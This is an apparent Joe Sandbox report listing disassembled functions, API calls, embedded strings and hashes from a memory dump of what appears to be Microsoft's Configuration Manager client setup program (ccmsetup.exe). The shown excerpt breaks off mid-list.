                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch_$CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$GetProductInstalledByUpgradeCode( c_szClientUpgradeCode, bIsInstalled )$IsClientInstalled$util.cpp$util.cpp${252DA259-82CA-4177-B8D0-49C78937BA3E}
                                                                                          • API String ID: 3561464689-4268580380
                                                                                          • Opcode ID: a087231561a97ca9c75833112b58be2d624b43b6a66c950256580a88404d28f1
                                                                                          • Instruction ID: 3543abcd691fa3c039e0e5bfdc2057bf4e47b68917021cd8b52e4432bf629e4b
                                                                                          • Opcode Fuzzy Hash: a087231561a97ca9c75833112b58be2d624b43b6a66c950256580a88404d28f1
                                                                                          • Instruction Fuzzy Hash: 96112471D45389BADB21E7A8890ABEE7F7A6F61700F188046F540773C2CBB49A04C3A1
                                                                                          Function 005F4CCF Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 59threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F4CD6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F4D29
                                                                                          • __CxxThrowException@8.LIBCMT ref: 005F4D9C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentException@8H_prolog3_catchThreadThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\String.cpp$..\String.cpp$CCM::Utility::String::append$pszUnicodeString != 0
                                                                                          • API String ID: 3856859314-3928025451
                                                                                          • Opcode ID: ec265203a08562baf660c8a1576b436c02f720e72e94d089eda017e8247b08af
                                                                                          • Instruction ID: c64271190c03d8b8be27ef2ae94f0f87148a3d0c0416dcd3c6771fb98bc731ca
                                                                                          • Opcode Fuzzy Hash: ec265203a08562baf660c8a1576b436c02f720e72e94d089eda017e8247b08af
                                                                                          • Instruction Fuzzy Hash: D011B971D8035AEACB21FBA4DC1EBAF7E247F51724F188145B654AB2C2C77C0A04DB91
                                                                                          Function 005E9009 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005E9010
                                                                                          • RevertToSelf.KERNELBASE(00000010,0062A535,AADAuthUrl,?,ResourceUri,?,ClientAppId,?,80000002,SOFTWARE\Microsoft\CCM\AADConfigs,00020019,00000001,?,CcmUtilLib::CcmGetAADOnboardingInfo,00000024,0061D7F1), ref: 005E9024
                                                                                          • ImpersonateLoggedOnUser.ADVAPI32 ref: 005E9031
                                                                                          • GetLastError.KERNEL32(00000002), ref: 005E905B
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          • CloseHandle.KERNEL32(?,00000010,0062A535,AADAuthUrl,?,ResourceUri,?,ClientAppId,?,80000002,SOFTWARE\Microsoft\CCM\AADConfigs,00020019,00000001,?,CcmUtilLib::CcmGetAADOnboardingInfo,00000024), ref: 005E907E
                                                                                          Strings
                                                                                          • Failed to restore thread user token. Error %u, xrefs: 005E9065
                                                                                          • }, xrefs: 005E9054
                                                                                          • X:\bt\1024777\repo\src\common\inc\ccmutil.h, xrefs: 005E904D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentErrorH_prolog3HandleImpersonateLastLoggedRevertSelfThreadUser
                                                                                          • String ID: Failed to restore thread user token. Error %u$X:\bt\1024777\repo\src\common\inc\ccmutil.h$}
                                                                                          • API String ID: 2475037923-1763857403
                                                                                          • Opcode ID: 78e240c4521a9cfb27e7474ea1eeb0286d64c90a95a76db4ba11a29114501ddf
                                                                                          • Instruction ID: 8b674b52e63b572c9233f161f1f81bf46e5902af3fd225678da5926495718e11
                                                                                          • Opcode Fuzzy Hash: 78e240c4521a9cfb27e7474ea1eeb0286d64c90a95a76db4ba11a29114501ddf
                                                                                          • Instruction Fuzzy Hash: 2201AD75800246EFFB35AFA1E80E3ADBFB5BF00311F50050AE4D5A62E1DBB60A94CB51
                                                                                          Function 005A0C83 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 005A0C8D
                                                                                          • CoInitializeEx.COMBASE(00000000,00000000,0000038C), ref: 005A0C99
                                                                                            • Part of subcall function 00576C9E: __EH_prolog3.LIBCMT ref: 00576CA5
                                                                                            • Part of subcall function 0058C6DE: __EH_prolog3_catch_GS.LIBCMT ref: 0058C6E5
                                                                                            • Part of subcall function 0058C6DE: GetCurrentThreadId.KERNEL32 ref: 0058C747
                                                                                          • CoUninitialize.COMBASE ref: 005A0D8F
                                                                                            • Part of subcall function 0059DAAD: __EH_prolog3_catch_GS.LIBCMT ref: 0059DAB4
                                                                                            • Part of subcall function 0059DAAD: GetCurrentThreadId.KERNEL32 ref: 0059DB24
                                                                                          Strings
                                                                                          • CcmSetup is exiting with return code %d, xrefs: 005A0D3D
                                                                                          • CcmSetup failed with error code 0x%x, xrefs: 005A0D66
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catch_Thread$H_prolog3H_prolog3_InitializeUninitialize
                                                                                          • String ID: CcmSetup failed with error code 0x%x$CcmSetup is exiting with return code %d
                                                                                          • API String ID: 2022865156-3475839849
                                                                                          • Opcode ID: 4c508d2bdb0f615d4bcc75edce58ff84ee748461ca13d69730206ca9a8b8ea69
                                                                                          • Instruction ID: b45f7c5af0b9b178d62cbda6d85b7b7281e1afde67c191907cee7060a03f7b4e
                                                                                          • Opcode Fuzzy Hash: 4c508d2bdb0f615d4bcc75edce58ff84ee748461ca13d69730206ca9a8b8ea69
                                                                                          • Instruction Fuzzy Hash: 3821BF7162035557DB21AF609C19BEEBFB9BF83700F006199E5896B2C2CB715A46DB20
                                                                                          Function 00623DD4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • CcmUtilLib::CcmGetCertificateStoreName, xrefs: 00623DE5
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 00623E33
                                                                                          • Certificate Store, xrefs: 00623E2E
                                                                                          • Personal, xrefs: 00623E47
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch
                                                                                          • String ID: CcmUtilLib::CcmGetCertificateStoreName$Certificate Store$Personal$Software\Microsoft\CCM\Security
                                                                                          • API String ID: 3886170330-2484193820
                                                                                          • Opcode ID: 864098ef1218fd7e719c4fc250b1905473d6cccc1fc1104679843768bfce35cd
                                                                                          • Instruction ID: 3ef0f1ebeb75a4f7da49bf6e3ba05c4d14c0cd30b917c22bb7848697bed6d92b
                                                                                          • Opcode Fuzzy Hash: 864098ef1218fd7e719c4fc250b1905473d6cccc1fc1104679843768bfce35cd
                                                                                          • Instruction Fuzzy Hash: 6501C460740B7792CB11B7A81926BBE5E272FC1720F15021EB691673C2DF6C5B069AD2
                                                                                          Function 005FB867 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005FB86E
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005FB59B: __EH_prolog3_catch.LIBCMT ref: 005FB5A2
                                                                                            • Part of subcall function 005FB59B: GetSystemInfo.KERNEL32(?,00000000,000000FF,CCM::Utility::GetProcessorArchitecture,0000007C,005B5198,?,DetectPlatform,0000004C,005A6602,?,?,CcmSetupManifest::GetApplicableInstallList,00000148,005A57F2,?), ref: 005FB5FB
                                                                                            • Part of subcall function 005FB59B: GetCurrentThreadId.KERNEL32 ref: 005FB642
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3H_prolog3_catchH_prolog3_catch_InfoSystemThread
                                                                                          • String ID: CCM::Utility::IsCCMSupportedOS$amd64$ia64
                                                                                          • API String ID: 27531171-2536884697
                                                                                          • Opcode ID: d32aaa41b575b7e25cf7426b43da705061ad33a342f67007b846a078698ee627
                                                                                          • Instruction ID: 522ea91796b178a465f7b058a3d5fe757dd4c0e7a9a28b402efa4bd5d89351fa
                                                                                          • Opcode Fuzzy Hash: d32aaa41b575b7e25cf7426b43da705061ad33a342f67007b846a078698ee627
                                                                                          • Instruction Fuzzy Hash: 2E31A0A084524DF5EB11EBA8CA5ABFDAF68BF42344F148489F341372D2C7AC0B09D760
                                                                                          Function 005F7229 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,CCM::Utility::RegKey::Open,00000018,005FAEB5,80000002,00000000,00000000,00000000,00000000,000000FF,CCM::Utility::GetCcmDirectory,0000001C), ref: 005F72CF
                                                                                          • RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00000300,00000000,00000000), ref: 005F733B
                                                                                            • Part of subcall function 005FC812: __EH_prolog3_catch.LIBCMT ref: 005FC819
                                                                                            • Part of subcall function 005FC812: GetModuleHandleW.KERNEL32(kernel32,CCM::Utility::IsWow64,0000001C,005FAE8E,00000000,00000000,000000FF,CCM::Utility::GetCcmDirectory,0000001C,005F9BFF,?), ref: 005FC851
                                                                                            • Part of subcall function 005FC812: GetLastError.KERNEL32(00000000), ref: 005FC867
                                                                                            • Part of subcall function 005FC812: GetCurrentThreadId.KERNEL32 ref: 005FC89C
                                                                                            • Part of subcall function 005FC812: FreeLibrary.KERNEL32(00000008), ref: 005FC973
                                                                                            • Part of subcall function 005F66CD: RegCloseKey.ADVAPI32(?,00000000,005F72B6,CCM::Utility::RegKey::Open,00000018,005FAEB5,80000002,00000000,00000000,00000000,00000000,000000FF,CCM::Utility::GetCcmDirectory,0000001C,005F9BFF,?), ref: 005F66D9
                                                                                          Strings
                                                                                          • CCM::Utility::RegKey::Open, xrefs: 005F723E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catchOpen$CloseCurrentErrorFreeHandleLastLibraryModuleThread
                                                                                          • String ID: CCM::Utility::RegKey::Open
                                                                                          • API String ID: 2518332988-2537231124
                                                                                          • Opcode ID: 652e3e81c79e28d548818d52a4caee83dede51a4442018dec54c35c649f23ede
                                                                                          • Instruction ID: f1912fa6dc80fe8dfe060eb3bf86b5e83c6ae1ade843b5a12470d6e62adaaa5c
                                                                                          • Opcode Fuzzy Hash: 652e3e81c79e28d548818d52a4caee83dede51a4442018dec54c35c649f23ede
                                                                                          • Instruction Fuzzy Hash: 4B31BF71A0525EDBDF11DFA8C809BBE7EA5BF88310F04451AFA14A72D0C7788E40DB95
                                                                                          Function 005B76E6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005B76ED
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 005F6FE7: __EH_prolog3_catch.LIBCMT ref: 005F6FEE
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • SetupParameters, xrefs: 005B773A
                                                                                          • SOFTWARE\Policies\Microsoft\Ccmsetup, xrefs: 005B7721
                                                                                          • Found additional ccmsetup.exe parameters through the registry., xrefs: 005B7759
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_catch$CloseCurrentThread
                                                                                          • String ID: Found additional ccmsetup.exe parameters through the registry.$SOFTWARE\Policies\Microsoft\Ccmsetup$SetupParameters
                                                                                          • API String ID: 2495189138-340935754
                                                                                          • Opcode ID: fe0f949c50789521290f02cc9717ee1cc7c91804e5b4ae695a76bdda83ab0bb6
                                                                                          • Instruction ID: e821b30429de6f059e5f10163932bf1bc45a8fd3313781964e80a8583dee6f6b
                                                                                          • Opcode Fuzzy Hash: fe0f949c50789521290f02cc9717ee1cc7c91804e5b4ae695a76bdda83ab0bb6
                                                                                          • Instruction Fuzzy Hash: 0301657090122FAACF10EBA0C80A9EEBF75FF58314F10025AF610B61C1DF749605CB94
                                                                                          Function 0062552C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00625533
                                                                                            • Part of subcall function 0061F559: __EH_prolog3_catch.LIBCMT ref: 0061F560
                                                                                            • Part of subcall function 0061F559: GetCurrentThreadId.KERNEL32 ref: 0061F5BB
                                                                                          Strings
                                                                                          • ClientAlwaysOnInternet, xrefs: 00625562
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 00625567
                                                                                          • CcmUtilLib::CcmIsClientAlwaysOnInternet, xrefs: 00625540
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CurrentThread
                                                                                          • String ID: CcmUtilLib::CcmIsClientAlwaysOnInternet$ClientAlwaysOnInternet$Software\Microsoft\CCM\Security
                                                                                          • API String ID: 4040336050-3306042326
                                                                                          • Opcode ID: 4049e62df8d7b9b8a8e0249e0eda7506a508a8970b45b185fc65b359202161a9
                                                                                          • Instruction ID: 113a731600193e17fdb89d22be55259c2f93ce23dde125fcffd440f439f0db7c
                                                                                          • Opcode Fuzzy Hash: 4049e62df8d7b9b8a8e0249e0eda7506a508a8970b45b185fc65b359202161a9
                                                                                          • Instruction Fuzzy Hash: 9D012671E4175ACBCB11DBE880067EDBFB25F10320F14400AF550B7282C7784B04CBA2
                                                                                          Function 00623CB6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • Certificate Issuers, xrefs: 00623D04
                                                                                          • CcmUtilLib::CcmGetCertificateIssuers, xrefs: 00623CC7
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 00623D09
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch
                                                                                          • String ID: CcmUtilLib::CcmGetCertificateIssuers$Certificate Issuers$Software\Microsoft\CCM\Security
                                                                                          • API String ID: 3886170330-1757966838
                                                                                          • Opcode ID: 6389fad190ad8526fc58d78742d271d77a53cef62c8e7d9f487103533f7aa7d3
                                                                                          • Instruction ID: 4d72306cde0445083b8a6a1e68d73929e22f680674c7ad2b0d38233294324f45
                                                                                          • Opcode Fuzzy Hash: 6389fad190ad8526fc58d78742d271d77a53cef62c8e7d9f487103533f7aa7d3
                                                                                          • Instruction Fuzzy Hash: E2F0C27064076AEACF21EBB48916BDD7E226F50750F14406EB9806B382CB794B41DB85
                                                                                          Function 0057C712 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00577076: __EH_prolog3.LIBCMT ref: 0057707D
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0057C72F
                                                                                            • Part of subcall function 005D21C0: RaiseException.KERNEL32(?,?,005D0C93,?,?,?,?,?,?,?,005D0C93,?,0090E984,?), ref: 005D2215
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0057C73C
                                                                                            • Part of subcall function 0061FEB6: __EH_prolog3_catch_GS.LIBCMT ref: 0061FEC0
                                                                                            • Part of subcall function 005C948C: __EH_prolog3_catch.LIBCMT ref: 005C9493
                                                                                            • Part of subcall function 005C948C: GetCurrentThreadId.KERNEL32 ref: 005C9512
                                                                                          Strings
                                                                                          • ClientDeploymentErrorCode, xrefs: 0057C758
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentExceptionException@8H_prolog3H_prolog3_H_prolog3_catchH_prolog3_catch_RaiseThreadThrow
                                                                                          • String ID: ClientDeploymentErrorCode
                                                                                          • API String ID: 3582305682-638181262
                                                                                          • Opcode ID: 841c04eed3c4802c43b45e1a9538c1b6d6111927d34e1d906b3974540f5fdcc9
                                                                                          • Instruction ID: 1f3486a3cb073dc2476d027b07077ad676d81da32b0ea564997cd8e0217b3877
                                                                                          • Opcode Fuzzy Hash: 841c04eed3c4802c43b45e1a9538c1b6d6111927d34e1d906b3974540f5fdcc9
                                                                                          • Instruction Fuzzy Hash: 7D115E7290021DAEDB04EAE48D4AEEDBA38BB54710F540159F215771C2DBB05F45CB61
                                                                                          Function 0060147F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoQueryProxyBlanket.OLE32(00000002,0000000A,00000008,00000000,?,00000000,00000000,00000000,00000000), ref: 006014B8
                                                                                          • CoSetProxyBlanket.COMBASE(00000002,000000FF,000000FF,00000000,00000000,00000003,00000000,00000020), ref: 006014E2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
